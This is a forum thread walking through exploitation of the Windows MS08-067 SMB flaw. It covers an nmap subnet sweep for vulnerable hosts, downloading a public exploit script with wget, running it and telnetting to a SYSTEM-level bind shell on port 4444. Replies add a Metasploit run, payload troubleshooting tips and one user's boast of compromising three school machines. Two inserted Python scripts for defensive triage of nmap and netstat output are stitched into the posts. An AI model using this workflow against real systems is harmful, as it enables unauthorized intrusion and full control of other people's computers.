
Thread: Playing with ms08_067


  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Playing with ms08_067

    So since some other people have posted some stuff on this exploit I figured I'd see what I could add. The first really cool thing I found (Thanks Arkaic)
    was a script for nmap which checks for the vulnerability. If anyone is unfamiliar with the nmap scripting engine you are really missing out. Maybe if there is some demand we can do a write-up on it later. So we need to check out an experimental branch of nmap in order to get the needed libraries for it to work. If your nmap breaks because of this it's not my fault. Mine is fine so yours should be as well. Ok here we go
    Code:
    b4cktr4ck3 / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron
    b4cktr4ck3 / # cd ron/nmap-smb
    b4cktr4ck3 nmap-smb # ./configure
    b4cktr4ck3 nmap-smb # make
    b4cktr4ck3 nmap-smb # make install
    Ok so all we did was rebuild nmap with a new branch. This actually gives us a bunch of new scripts to check out but for the sake of this post we will only use one. So now we can run a scan. The reason I searched this out is because the metasploit module to do the scan test (to my knowledge) only does one host at a time. I was looking to cover subnets if need be.

    Okay so let's run our new script...
    Code:
    b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse  -p 445 192.168.1.0/24 
    
    Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
    Interesting ports on firewall.localhost.com (192.168.1.1):
    PORT    STATE    SERVICE
    445/tcp filtered microsoft-ds
    MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
    
    Interesting ports on 192.168.1.127:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    
    Interesting ports on 192.168.1.128:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    MAC Address: 00:04:4B:18:69:8A (Nvidia)
    
    Interesting ports on 192.168.1.237:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:0C:29:4A:B6:6D (VMware)
    
    Host script results:
    |_ smb-check-vulns: This host is vulnerable to MS08-067
    
    Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
    As you can see we have a victim...er winner!

    So just so this post won't be so short and lame we can also go ahead and see if we can pop this box. For this trick I'll go to milw0rm and grab a recent .py sploit on the subject.
    Code:
    b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
    --13:45:35--  http://www.milw0rm.com/exploits/download/7132.py
               => `7132.py'
    Resolving www.milw0rm.com... 76.74.9.18
    Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/plain]
    
        [ <=>                              ] 7,085         --.--K/s             
    
    13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
    Ok so if you open up the exploit (which you should always do) and give it a quick read you will see there is a Windows 2003 payload (#2) and a 2000 payload (#1) {thanks to TheX1le}, so due to our scan results we are going to need 2003 so...
    Code:
    b4cktr4ck3 / # python 7132.py 192.168.1.237 2
    #######################################################################
    #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
    #   www.hackingspirits.com
    #   www.coffeeandsecurity.com
    #   Email: d3basis.m0hanty @ gmail.com
    #######################################################################
    
    [-]Windows 2003[SP2] payload loaded
    [-]Initiating connection
    [-]connected to ncacn_np:192.168.1.237[\pipe\browser]
    [-]Exploit sent to target successfully...
    [1]Telnet to port 4444 on target machine...
    Cool, seems we have successfully "popped" the box, so let's see...
    Code:
    b4cktr4ck3 / # telnet 192.168.1.237 4444
    Trying 192.168.1.237...
    Connected to 192.168.1.237.
    Escape character is '^]'.
    Microsoft Windows [Version 5.2.3790]
    (C) Copyright 1985-2003 Microsoft Corp.
    
    C:\WINDOWS\system32>
    Very Nice!
    Code:
    C:\WINDOWS\system32>whoami
    whoami
    nt authority\system
    Well that's it for this post. If you found any of this info helpful please let me know and I will post more how-to's on this type of thing, otherwise just tell me I suck and I'll go back to moderating with an iron fist
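    The nmap sweep above prints one block per host, with the smb-check-vulns verdict under "Host script results". As an added example (not from pureh@te's post or the nmap project), here is a small Python parser for that normal-output layout that turns a subnet sweep into a patch list for the people who own the boxes: hosts the script flagged, hosts with 445 open that returned no script result and still need a look, and everything exposing 445 at all. The embedded sample output is constructed to mirror the post's format; the "not vulnerable" line is assumed wording for illustration, not verified script output.

```python
"""Parse nmap normal output (nmap 4.x layout) and build an MS08-067 remediation list."""
import re

# Constructed sample in the layout of the post's nmap run; the fourth host and its
# "not vulnerable" result are assumed wording added for illustration.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)

Interesting ports on 192.168.1.128:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Interesting ports on 192.168.1.237:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)

Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067

Interesting ports on 192.168.1.240:
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_ smb-check-vulns: This host is not vulnerable to MS08-067

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
"""

# "Interesting ports on name (1.2.3.4):" or "Interesting ports on 1.2.3.4:"
HOST_RE = re.compile(r"^Interesting ports on (?:(\S+) \()?(\d+\.\d+\.\d+\.\d+)\)?:$")
# "445/tcp open  microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\w+)\s+(\S+)")
# "|_ smb-check-vulns: <verdict>"
SCRIPT_RE = re.compile(r"^\|_?\s*smb-check-vulns:\s*(.*)$")


def parse_nmap_output(text):
    """Return one dict per host: hostname, ip, {port: state}, smb_check verdict."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = {"hostname": m.group(1), "ip": m.group(2),
                       "ports": {}, "smb_check": None}
            hosts.append(current)
            continue
        if current is None:
            continue  # banner lines before the first host
        m = PORT_RE.match(line)
        if m:
            current["ports"][int(m.group(1))] = m.group(2)
            continue
        m = SCRIPT_RE.match(line)
        if m:
            # The script block follows the host's port table, so it belongs to `current`.
            current["smb_check"] = m.group(1).strip()
    return hosts


def ms08_067_triage(hosts):
    """Bucket hosts for remediation: flagged, exposed-but-unchecked, and all exposing 445."""
    vulnerable = [h["ip"] for h in hosts
                  if h["smb_check"] and h["smb_check"].startswith("This host is vulnerable")]
    unchecked = [h["ip"] for h in hosts
                 if h["ports"].get(445) == "open" and h["smb_check"] is None]
    exposed = [h["ip"] for h in hosts if h["ports"].get(445) == "open"]
    return {"vulnerable": vulnerable, "open_445_unchecked": unchecked, "open_445": exposed}


if __name__ == "__main__":
    for bucket, ips in ms08_067_triage(parse_nmap_output(SAMPLE_NMAP_OUTPUT)).items():
        print(f"{bucket}: {', '.join(ips) or '-'}")
```

    Feed it `nmap -oN` output (the same format the post shows on screen) from a whole subnet and the "vulnerable" bucket is the list to hand to whoever applies the MS08-067 update; the "open_445_unchecked" bucket catches hosts where the script did not return a verdict, which is exactly the situation a later reply in this thread describes.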

  2. #2
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    5

    awesome! :)

    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because it is prepared for more Windows languages..

    btw, thanks, very nice post!

    cheers!

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,126


    Quote Originally Posted by thebug
    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because it is prepared for more Windows languages..

    btw, thanks, very nice post!

    cheers!
    I would never use autopwn in a real test situation. It's far too noisy. Also the "old" nmap as you put it does not do what this nmap script does. The script checks the port and then reports whether it's vulnerable or not.

  4. #4
    Just burned his ISO Lammer's Avatar
    Join Date
    Nov 2008
    Posts
    11

    Great!

    Very nice how-to pureh@te.
    I think this kind of info is very, very useful.
    Please keep sending them.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    6


    I was able to successfully sploit 3 Windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though

  6. #6
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908


    Quote Originally Posted by anonymoususer
    I was able to successfully sploit 3 Windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though
    With permission of course........



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  7. #7
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    19


    @anonymoususer

    Are you sure you did it on XP-SP2? It does not have the payload for XP-SP2, and I have myself tried on 3 machines of XP-SP2 which have the port open, but the exploit doesn't work, and neither does the script tell

    results like:
    |_ smb-check-vulns: This host is vulnerable to MS08-067

    but just show port open


    @pureh@te

    it's just AWESOME, we need more like that

  8. #8
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    14

    nmap.org

    awesome post, led me to nmap.org where I found some more very interesting things about nmap,



    thanks pureh@te keep up the great work.

  9. #9
    Junior Member Tr00g33k's Avatar
    Join Date
    Jul 2008
    Posts
    46


    OK I have one weird problem, I get the message
    Exploit sent to target successfully
    Telnet to port 4444 on target machine
    And when I try to telnet: connection refused, any idea?

    Tr00G33k

    and if i use metasploit:

    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 3 - lang:English
    [*] Selected Target: Windows XP SP3 English (NX)
    [*] Triggering the vulnerability...
    [*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >

  10. #10


    What kind of payload are you using? If it is a simple tcp_backdoor then on the box you just exploited, open a cmd shell, run netstat -an and if you see TCP/4444 listening, then the problem is probably firewall related.

    If you are using a reverse_tcp_backdoor, then my guess is that the victim is not allowing the backdoor to install/execute. Try a different payload.

    Since you provided no information about your network or victim host setup, this is all I can think of.
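    The reply above boils down to reading `netstat -an` on the affected host and asking two questions: is there a listener that should not be there (a bind-style payload), or an outbound connection to a handler port (a reverse-style payload)? As an added example, not from this thread's posters or from Metasploit, here is a Python triage script that answers both questions over a `netstat -an` dump, which is also what an incident responder does when checking a host that was hit during a test. The sample dump is constructed in the Windows XP/2003 `netstat -an` layout, the baseline set of expected listeners is an assumption for the example, and only IPv4 rows are parsed.

```python
"""Triage a Windows `netstat -an` dump: unexpected TCP listeners and outbound
connections to a given remote port (IPv4 only; constructed sample input)."""
import re

# Constructed sample in the layout of Windows XP/2003 `netstat -an` output.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    192.168.1.237:139      0.0.0.0:0              LISTENING
  TCP    192.168.1.237:4444     192.168.1.5:51234      ESTABLISHED
  TCP    192.168.1.237:1042     192.168.1.5:4444       SYN_SENT
  UDP    0.0.0.0:445            *:*
"""

# Assumed baseline of TCP listeners for a plain Windows 2003 file server;
# a real baseline should be taken from a known-clean build of the same role.
BASELINE_TCP_LISTENERS = {135, 139, 445}

# "  TCP    1.2.3.4:445   5.6.7.8:0   LISTENING" (state is absent on UDP rows)
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text):
    """Return one dict per socket row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, raddr, rport, state = m.groups()
        rows.append({"proto": proto, "local": laddr, "lport": int(lport),
                     "remote": raddr, "rport": rport, "state": state or ""})
    return rows


def unexpected_tcp_listeners(rows, baseline=BASELINE_TCP_LISTENERS):
    """Bind-style payloads appear as LISTENING sockets outside the baseline."""
    return sorted({r["lport"] for r in rows
                   if r["proto"] == "TCP" and r["state"] == "LISTENING"
                   and r["lport"] not in baseline})


def inbound_peers(rows, local_port):
    """Remote addresses currently connected to a local port (who is on that listener)."""
    return [r["remote"] for r in rows
            if r["proto"] == "TCP" and r["lport"] == local_port
            and r["state"] == "ESTABLISHED"]


def outbound_to_port(rows, remote_port):
    """Reverse-style payloads appear as outbound connections to the handler port."""
    return [(r["remote"], r["state"]) for r in rows
            if r["proto"] == "TCP" and r["rport"] == str(remote_port)
            and r["state"] in ("SYN_SENT", "ESTABLISHED")]


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("listeners outside baseline:", unexpected_tcp_listeners(rows))
    print("peers on 4444:", inbound_peers(rows, 4444))
    print("outbound to :4444:", outbound_to_port(rows, 4444))
```

    The two payload shapes leave different footprints: a bind payload shows up in the first function's result even before anyone connects, while a reverse payload that is being blocked on egress shows up as a `SYN_SENT` row in the last function's result, which distinguishes a host-side execution failure from a firewall problem without guessing.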
